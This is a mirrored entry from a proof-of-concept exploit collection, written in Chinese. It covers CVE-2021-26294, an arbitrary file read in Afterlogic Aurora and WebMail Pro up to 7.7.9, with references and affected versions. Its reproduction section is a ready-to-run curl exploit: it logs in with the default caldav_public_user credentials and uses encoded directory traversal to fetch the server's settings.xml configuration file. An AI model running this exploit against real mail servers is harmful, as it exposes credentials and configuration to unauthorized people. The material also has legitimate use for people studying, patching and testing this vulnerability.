mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-05 10:50:23 +00:00
26 lines
775 B
Markdown
26 lines
775 B
Markdown
# Afterlogic Aurora & WebMail Pro 任意文件读取CVE-2021-26294
|
|
|
|
## 漏洞描述
|
|
|
|
攻击者可以通过caldav_public_user@localhost用户登录,不需要其它用户信息就可以读取配置文件从而获得敏感信息。
|
|
|
|
参考链接:
|
|
|
|
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26294
|
|
- https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26294-exposure-of-sensitive-information-vulnerability.md
|
|
- https://forum.ywhack.com/thread-115326-1-8.html
|
|
|
|
## 漏洞影响
|
|
|
|
```
|
|
WebMail Pro ≤ 7.7.9
|
|
Afterlogic Aurora ≤ 7.7.9
|
|
```
|
|
|
|
## 漏洞复现
|
|
|
|
```
|
|
curl -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml"
|
|
```
|
|
|